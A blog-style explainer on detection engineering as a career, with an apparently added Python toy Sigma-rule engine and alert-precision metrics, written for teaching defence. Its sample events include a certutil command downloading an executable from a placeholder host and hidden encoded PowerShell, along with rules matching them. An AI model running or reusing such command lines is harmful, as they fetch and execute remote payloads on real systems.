Detection Engineering Series: Detection Engineering Explained
Detection Engineering, what does the role entail?
What used to be one function of the job for an incident responder, a DART (Detection and Response Team) member, or a threat researcher is now a full-blown career path of its own.
As the complexity and frequency of cyber threats increase, so does the demand for specialized roles to combat these threats.
Detection Engineering plays a crucial role in identifying, and ultimately preventing, security breaches in organizations, frequently partnering with teams like Product Security and Enterprise Security.
But what exactly is this discipline and what skills does it require to succeed in this sub-domain of Cybersecurity?
Below is a general outline of what to look for.
The TLDR of Detection Engineering
In a nutshell, a detection is logic that produces an actionable finding: one that carries enough context for an analyst or engineer to respond to it. The logic can be expressed in many forms, such as a KQL or SPL query, a Sigma rule, a YARA rule, a JSON or YAML rule definition consumed by a platform, custom Python, and more.
For now, we can leave it at this: each detection is composed of logic designed to match specific patterns or anomalies that might indicate a security threat.
To become a Detection Engineer, you need to possess several essential skills.
The Essential Toolkit
Deep Understanding of Your Tools
In order to understand your tools you need a good foundation in network security, protocols, and scripting, and you need to be tool-agnostic. The tools in question include Intrusion Detection Systems (IDS), Endpoint Detection and Response (EDR), Security Information and Event Management (SIEM), and Security Orchestration, Automation and Response (SOAR). This matters because the data these tools produce is what your detection logic will be built on, in some way, shape or form.
You should have a deep understanding of common attack methods, threat actors, and security best practices to detect and prevent security breaches.
Analytical
In addition, you need to be familiar with the techniques and methods used by attackers to gain unauthorized access to computer systems, networks, or data.
Analytical skills are critical for working through large volumes of data and identifying potential threats, patterns, and suspicious activity; you will frequently be working with large datasets.
Stats
Quantifying and measuring the effectiveness of your detection logic, using statistical data about the events it consumes and the alerts it produces (volume, true and false positives, time to triage), is also important.
You don't need to be a statistician, just become proficient in the tools at your disposal. Being able to tell a story through that data is huge when it comes to management and other stakeholders. Being able to point at a chart or graph and say, "here is how we're doing", is immensely valuable.
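To make the TLDR and the Stats sections concrete, here is an added example that is not code from the original post: a toy Sigma-style rule engine run over constructed process-creation events, followed by the per-rule alert volume and precision you would put in front of stakeholders, plus a check for rules that never fired. The events, rule contents, field names (Image, CommandLine) and analyst dispositions are all assumptions made up for illustration; only a few Sigma modifiers (contains, startswith, endswith, all) are implemented, and the 198.51.100.7 address is a documentation-range placeholder.

```python
# Added example (not from the original post): a toy Sigma-style rule engine
# run over constructed process-creation events, then the effectiveness numbers
# the Stats section asks for. Events, rules, field names and dispositions are
# assumptions for illustration, not a real vendor schema or real incident data.

# Constructed telemetry: Sysmon/EDR-like process-creation events.
EVENTS = [
    {"id": 1, "host": "ws01", "user": "alice",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
    {"id": 2, "host": "ws02", "user": "bob",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"id": 3, "host": "srv01", "user": "svc-backup",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand JABzAD0AJwBiAGEAYwBrAHUAcAAnAA=="},
    {"id": 4, "host": "ws01", "user": "alice",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://198.51.100.7/a.exe a.exe"},
    {"id": 5, "host": "ws04", "user": "carol",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},
]

# Rules in a Sigma-like shape: one selection map, every key ANDed, list values
# ORed unless the '|all' modifier is present. Only a subset of Sigma modifiers
# is implemented here.
RULES = [
    {"title": "Encoded PowerShell Command", "level": "high",
     "selection": {"Image|endswith": r"\powershell.exe",
                   "CommandLine|contains": ["-enc ", "-encodedcommand "]}},
    {"title": "Certutil Remote Download", "level": "high",
     "selection": {"Image|endswith": r"\certutil.exe",
                   "CommandLine|contains|all": ["urlcache", "http"]}},
    {"title": "Schtasks Persistence", "level": "medium",
     "selection": {"Image|endswith": r"\schtasks.exe",
                   "CommandLine|contains": "/create"}},
]

# Constructed analyst triage outcomes, keyed by (rule title, event id).
DISPOSITIONS = {
    ("Encoded PowerShell Command", 2): "true_positive",
    ("Encoded PowerShell Command", 3): "false_positive",  # known backup job
    ("Certutil Remote Download", 4): "true_positive",
}


def _match_one(value, expected, mods):
    """Compare one field value with one expected value; case-insensitive like Sigma."""
    v, e = str(value).lower(), str(expected).lower()
    if "contains" in mods:
        return e in v
    if "startswith" in mods:
        return v.startswith(e)
    if "endswith" in mods:
        return v.endswith(e)
    return v == e


def selection_matches(event, selection):
    """True when every field of the selection matches the event."""
    for key, expected in selection.items():
        field, *mods = key.split("|")
        if field not in event:
            return False
        candidates = expected if isinstance(expected, list) else [expected]
        hits = [_match_one(event[field], c, mods) for c in candidates]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True


def run_detections(events, rules):
    """Evaluate every rule against every event. Each hit is an actionable finding
    carrying the context an analyst needs to respond (who, where, evidence)."""
    findings = []
    for rule in rules:
        for ev in events:
            if selection_matches(ev, rule["selection"]):
                findings.append({"rule": rule["title"], "level": rule["level"],
                                 "event_id": ev["id"], "host": ev["host"],
                                 "user": ev["user"], "evidence": ev["CommandLine"]})
    return findings


def rule_metrics(findings, dispositions, rules):
    """Per-rule alert volume and precision (TP / triaged alerts). Untriaged
    alerts count toward volume only; precision is None until something is triaged."""
    stats = {r["title"]: {"alerts": 0, "true_positive": 0, "false_positive": 0}
             for r in rules}
    for f in findings:
        s = stats[f["rule"]]
        s["alerts"] += 1
        outcome = dispositions.get((f["rule"], f["event_id"]))
        if outcome in ("true_positive", "false_positive"):
            s[outcome] += 1
    for s in stats.values():
        triaged = s["true_positive"] + s["false_positive"]
        s["precision"] = s["true_positive"] / triaged if triaged else None
    return stats


def silent_rules(stats):
    """Rules that never fired: candidates for a broken detection or a blind spot
    (missing telemetry), worth a root-cause look before assuming all is quiet."""
    return sorted(name for name, s in stats.items() if s["alerts"] == 0)


if __name__ == "__main__":
    found = run_detections(EVENTS, RULES)
    for f in found:
        print(f"[{f['level']}] {f['rule']} on {f['host']} ({f['user']}): {f['evidence']}")
    stats = rule_metrics(found, DISPOSITIONS, RULES)
    for name, s in stats.items():
        print(f"{name}: alerts={s['alerts']} precision={s['precision']}")
    print("silent rules:", silent_rules(stats))
```

Two things worth noticing when you run it: the encoded-PowerShell rule fires on both the attacker's command and the backup service account's scheduled job, so its precision is 0.5 and the service account is the obvious tuning candidate; and the schtasks rule has zero alerts, which is either good news or a sign that the telemetry it depends on never arrived. Those two numbers, per rule over time, are the start of the story the Stats section says you need to tell.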
Problem Solving Skills
Problem-solving skills are essential for identifying and solving complex problems and for making decisions under pressure, and in Detection & Response that happens often.
For example, urgently building a detection and alerting on it for a newly identified internal threat, or finding the root cause of a broken detection and fixing it because it has left you with a blind spot.
Lastly, Detection Engineers must be proactive in seeking out new information and resources to improve their knowledge as the world of Cybersecurity is constantly evolving.
Many posts have covered this very topic, from defining the concept of Detection Engineering to lifecycles for implementing detections.
Check out the following.
Understanding what skills are needed will equip you with the tools to succeed in Detection Engineering.
A later post will be dedicated to the intricacies of detections and alerts where we’ll do a deep dive.
I hope this helps you understand another domain within the umbrella that is Cybersecurity.